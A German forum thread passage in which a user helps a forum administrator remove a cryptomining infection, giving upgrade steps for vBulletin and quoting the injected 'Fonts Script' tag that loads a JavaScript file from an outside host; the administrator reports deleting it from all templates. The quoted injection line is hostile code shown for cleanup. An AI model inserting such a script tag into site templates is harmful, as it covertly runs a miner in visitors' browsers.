Seite 4 von 4 ErsteErste 1234
Ergebnis 31 bis 32 von 32

Thema: @Forenbetreiber und Admins

  1. #31
    Registriert seit
    12.04.2018
    Beiträge
    7

    Standard

    Nachtrag (um das Mining Problem zu lösen):
    0. Backup von FTP und Datenbank anlegen
    1. vBulletin Version 4.2.3 herunterladen (das komplette Board, nicht nur den Patch)
    2. Entpacken und hochladen (alle Dateien überschreiben).
    3. forum.f-sb.de/install/upgrade.php durchführen.

    Dann wäre das Forum definitiv von diesem Dreck entfernt.
    Ich weiß ja nicht wie du recherchiert hast, aber ich habe in 20 Sekunden Google folgenden Hinweis gefunden:
    Im Template Ordner des eingesetzten Themes nach der Header-Datei mit folgendem Eintrag schauen:
    <!-- Fonts Script -->
    <!-- script async="async" src="http://allfontshere.press/fonts/courier3.js"></script -->
    <!-- End Fonts Script -->
    Entfernen oder direkt eine saubere Datei hochladen, fertig.
    Und deaktiviert mal die Verwendung von "HTML" für normale Nutzer in Beiträgen, damit lassen sich tolle Sachen anstellen...
    Geändert von unerkannt (14.04.2018 um 00:46 Uhr)

  2. #32
    Registriert seit
    27.06.2009
    Ort
    NRW
    Beiträge
    5.521

    Standard

    Hi,
    ich hatte alle Forunmdateien nach Manipulationen ohne Erfolg durchsucht. Einen Templateordner gibt es nicht, aber dank Deinem Hinweis habe ich über die Templateverwaltung den Scriptaufruf in allen Templates löschen können.
    Fraglich nur, wie lange das Bestand hat ohne die Ursache zu patchen, weil ein Upgrade z.Z. nicht infrage kommt.

    Gruß
    Ingo

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •